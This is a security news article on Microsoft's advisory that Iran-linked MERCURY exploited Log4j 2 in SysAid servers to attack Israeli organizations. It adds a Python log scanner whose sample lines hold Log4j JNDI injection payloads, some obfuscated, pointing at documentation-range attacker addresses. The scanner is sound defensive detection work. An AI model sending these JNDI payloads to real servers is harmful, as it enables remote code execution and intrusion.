Iran-based threat actor MuddyWater (tracked by Microsoft as MERCURY) has been exploiting Log4j 2 vulnerabilities in SysAid applications to target organizations in Israel.
The news comes from a new advisory from Microsoft's security researchers, who said on Thursday they could assess with high confidence that MERCURY's observed activity is affiliated with Iran's Ministry of Intelligence and Security (MOIS).
“On July 23 and 25, 2022, MERCURY was observed using exploits against vulnerable SysAid Server instances as its initial access vector,” Microsoft wrote. “Based on observations from past campaigns and vulnerabilities found in target environments, [we] assess that the exploits used were most likely related to Log4j 2.”
The campaign observed by the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft 365 Defender Research Team differs from prior MERCURY campaigns in that it is the first in which the group has been seen exploiting SysAid applications as a vector for initial access.
“Following successful access, MERCURY establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack,” reads the advisory.
Microsoft also included a list of common techniques and tooling used by MERCURY, which include spearphishing, along with tools such as the Venom proxy, the Ligolo reverse tunneling tool and custom-built PowerShell programs.
Microsoft confirmed it has notified customers that were targeted or compromised, providing them with the information needed to secure their accounts. The company has also published a list of indicators of compromise (IOCs) linked to MERCURY's activity.
“We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.”
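As an added illustration of the kind of detection the advisory recommends (example code written for this page, not Microsoft's or SysAid's tooling, and not derived from the published IOCs), the following Python scans web-server access-log lines for Log4j 2 JNDI lookup strings, the exploit pattern the advisory assesses MERCURY most likely used against SysAid Server. It URL-decodes each line and then evaluates the `${lower:..}`, `${upper:..}` and `${x:-y}` lookups attackers nest around the word `jndi` to evade naive string matching, the same way the vulnerable logger would. The log lines are constructed, the request paths are only assumed to resemble a Java web application, and the addresses use the 203.0.113.0/24 documentation range.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not real indicators from the advisory);
# the paths are only assumed to resemble a Java web application such as SysAid.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [23/Jul/2022:09:14:02 +0300] "GET /Login.jsp HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Jul/2022:09:14:10 +0300] "GET /Login.jsp?accountid=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Jul/2022:09:15:31 +0300] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [25/Jul/2022:11:02:44 +0300] "GET /api/v1/ HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/c}"',
    '10.0.0.9 - - [25/Jul/2022:11:03:01 +0300] "GET /x?q=%24%7Bjndi%3Aldaps%3A%2F%2F203.0.113.7%3A636%2Fd%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.12 - - [25/Jul/2022:11:10:00 +0300] "GET /docs?q=${env:HOME} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: no nested braces inside.
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# JNDI lookup with one of the schemes Log4j 2's JndiLookup will dereference.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http):", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Evaluate one innermost Log4j lookup the way the logger would, for the
    subset of lookups attackers use to hide the literal string 'jndi'."""
    prefix, sep, rest = inner.partition(":")
    if not sep:
        return "${" + inner + "}"          # plain ${name}: nothing to unwrap
    key = prefix.lower()
    if key == "jndi":
        return "${" + inner + "}"          # keep as-is so the detector can see it
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in inner:                       # ${x:-j} and ${env:NOPE:-j} yield the default "j"
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"              # env:, sys:, date:, ...: leave untouched


def deobfuscate(text: str, max_rounds: int = 50) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        before = text
        text = _LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if text == before:
            break
    return text


def url_decode(text: str, max_rounds: int = 3) -> str:
    """Undo (possibly repeated) percent-encoding of the request line."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def jndi_scheme(line: str):
    """Return the JNDI scheme (e.g. 'ldap') found in a log line after decoding
    and de-obfuscation, or None if the line carries no JNDI lookup."""
    m = _JNDI.search(deobfuscate(url_decode(line)))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return [(line_number, scheme)] for every line that contains a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((number, scheme))
    return hits


if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme}")
```

A hit only proves an attempt reached the application, not that the lookup was evaluated; to confirm exploitation, pair these matches with outbound LDAP, RMI or DNS connections from the SysAid host to the addresses in the lookup, and with the process-creation and credential-dumping activity the advisory describes as the follow-on stages.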
Microsoft is not the first to associate MERCURY with Iranian state actors. Earlier this year, both the U.K. and U.S. governments issued warnings connecting the group with the country's MOIS.